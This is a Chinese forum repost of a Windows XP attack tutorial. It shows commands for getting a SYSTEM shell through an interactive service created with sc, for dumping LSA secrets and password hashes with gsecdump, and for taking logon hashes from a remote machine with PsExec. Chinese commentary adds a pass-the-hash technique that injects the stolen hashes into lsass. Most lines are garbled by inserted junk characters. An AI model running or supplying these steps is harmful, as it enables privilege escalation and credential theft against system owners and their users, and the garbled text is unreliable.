o get a DOS Prompt as NT system:
+ F0 H( ~1 ~" J" _; W6 P
; h& F m! u7 U. V' X! MC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
( m6 z$ z) H: r& f) |( `% f[SC] CreateService SUCCESS
+ {! S9 i* v6 Z% ~ s& B" H$ M2 y2 J! ^& K
C:\>sc start shellcmdline; z4 `& ^1 { W1 \- f
[SC] StartService FAILED 1053:+ l/ J# {# r+ m. G) R6 E; D
! l" V: w0 x5 i' R
The service did not respond to the start or control request in a timely fashion./ E" S% C0 c! ^2 s1 U' }: T
$ F' G( Q3 K; bC:\>sc delete shellcmdline
3 B( N3 |0 E7 \1 J7 X+ ?[SC] DeleteService SUCCESS$ N. O: V( p9 g1 t* J0 f1 ]
) s, v9 _: X- E2 ^. \
------------
. @) O2 {* V4 x, |8 ?& E0 t2 r- [! c5 M) V4 n6 ]! ^
Then in the new DOS window:
1 I3 G# m$ S' Q. W
4 @0 i) x- Q8 m; g2 ?$ UMicrosoft Windows XP [Version 5.1.2600]
! ^, [& X* e0 V; H c* u9 \(C) Copyright 1985-2001 Microsoft Corp.
; R) o3 E% F7 Q! C9 R2 j. Q5 |) p7 m! I& z3 `
C:\WINDOWS\system32>whoami( D2 Z% M8 d! d* X
NT AUTHORITY\SYSTEM4 L/ i$ n! E; N O0 ^! w; w7 V
* g6 y* ?% B5 r" P# J& {C:\WINDOWS\system32>gsecdump -h4 c3 r* }0 ^2 d6 C2 n; r4 s x, E
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
5 g" _8 K: q, C5 r( J G0 e/ Pusage: gsecdump [options]3 [$ C0 [! \# j' k4 K
}/ g3 |& r9 [* ~) b0 Y
options:! q& h1 B+ ]/ j, D* m
-h [ --help ] show help7 A! E& P d9 J8 M
-a [ --dump_all ] dump all secrets
9 l6 _. q2 C% \9 G; g-l [ --dump_lsa ] dump lsa secrets1 T7 n1 {, ~! p( H! F( D: H
-w [ --dump_wireless ] dump microsoft wireless connections3 y, j6 ^9 B: P( R
-u [ --dump_usedhashes ] dump hashes from active logon sessions
3 R( A. Q6 F0 z5 w5 U-s [ --dump_hashes ] dump hashes from SAM/AD% O/ \/ R' D, _7 u$ x' T1 S% `) U
0 v; [1 A9 M- _' @7 [# L5 W
Although I like to use:" i- ^; |) M( n0 U4 o; B/ }( X% ^
+ |: x! Y& _3 u; Q0 o) i
PsExec v1.83 - Execute processes remotely
6 p% Q+ q7 N: q5 @; rCopyright (C) 2001-2007 Mark Russinovich3 N1 J% N& L, R2 {
Sysinternals - 链接标记[url]www.sysinternals.com[/url]" I1 k% u4 `+ ]; U
0 W" Z$ C: n: M; Q/ T
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT4 o( S+ Y9 T: i/ Z8 w
* q/ ?5 u9 j3 Z8 g! `2 T
to get the hashes from active logon sessions of a remote system.1 g% N9 R- i P* W
' B1 n3 l; H& KThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.2 ~4 m7 ?* _# S& X n$ v- I
' Y4 j& u7 S2 Y7 G: s. Q" I& k, {
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.1 h3 R: [! f: d a
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]1 n& S5 i- {* j* s; R
9 O' \8 J, ^9 E) I9 c! L( l
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
9 y$ w# q& R: j |
发表于 2012-11-6 21:09:29
收藏
支持
反对